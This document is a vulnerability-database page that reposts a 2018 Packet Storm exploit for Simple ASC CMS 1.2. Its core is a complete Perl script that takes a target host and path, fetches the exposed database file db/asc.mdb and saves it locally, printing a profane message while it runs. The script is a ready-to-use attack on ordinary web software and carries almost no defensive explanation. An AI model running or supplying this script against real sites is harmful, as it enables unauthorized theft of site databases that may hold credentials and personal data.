Lucene search

K

Simple ASC CMS 1.2 Database Disclosure

🗓️ 19 Jan 2018 00:00:00Reported by indoushkaType 
packetstorm
 packetstorm
🔗 packetstormsecurity.com👁 24 Views

Simple ASC CMS 1.2 Database Disclosure exploit on windows 8.

Show more

AI Insights are available for you today

Leverage the power of AI to quickly understand vulnerabilities, impacts, and exploitability

Code
`========================================================================  
| # Title : Simple ASC CMS 1.2 Database Disclosure Exploit  
| # Author : indoushka  
| # email : [email protected]  
| # Tested on : windows 8.1 FranASSais V.(Pro)  
| # Vendor : http://www.aspsource.org  
========================================================================  
  
#!/usr/bin/perl -w  
# Author : indoushka  
  
use LWP::Simple;  
use LWP::UserAgent;  
  
system('cls');  
system('Simple ASC CMS 1.2 Database Disclosure Exploit');  
system('color a');  
  
  
if(@ARGV < 2)  
{  
print "[-]How To Use\n\n";  
&help; exit();  
}  
sub help()  
{  
print "[+] usage1 : perl $0 site.com /path/ \n";  
print "[+] usage2 : perl $0 localhost / \n";  
}  
($TargetIP, $path, $File,) = @ARGV;  
  
$File="db/asc.mdb";  
my $url = "http://" . $TargetIP . $path . $File;  
print "\n Fuck you wait!!! \n\n";  
  
my $useragent = LWP::UserAgent->new();  
my $request = $useragent->get($url,":content_file" => "D:/asc.mdb");  
  
if ($request->is_success)  
{  
print "[+] $url Exploited!\n\n";  
print "[+] Database saved to D:/asc.mdb\n";  
exit();  
}  
else  
{  
print "[!] Exploiting $url Failed !\n[!] ".$request->status_line."\n";  
exit();  
}  
  
`

Transform Your Security Services

Elevate your offerings with Vulners' advanced Vulnerability Intelligence. Contact us for a demo and discover the difference comprehensive, actionable intelligence can make in your security strategy.

Book a live demo
19 Jan 2018 00:00Current
7.1High risk
Vulners AI Score7.1
24
.json
Report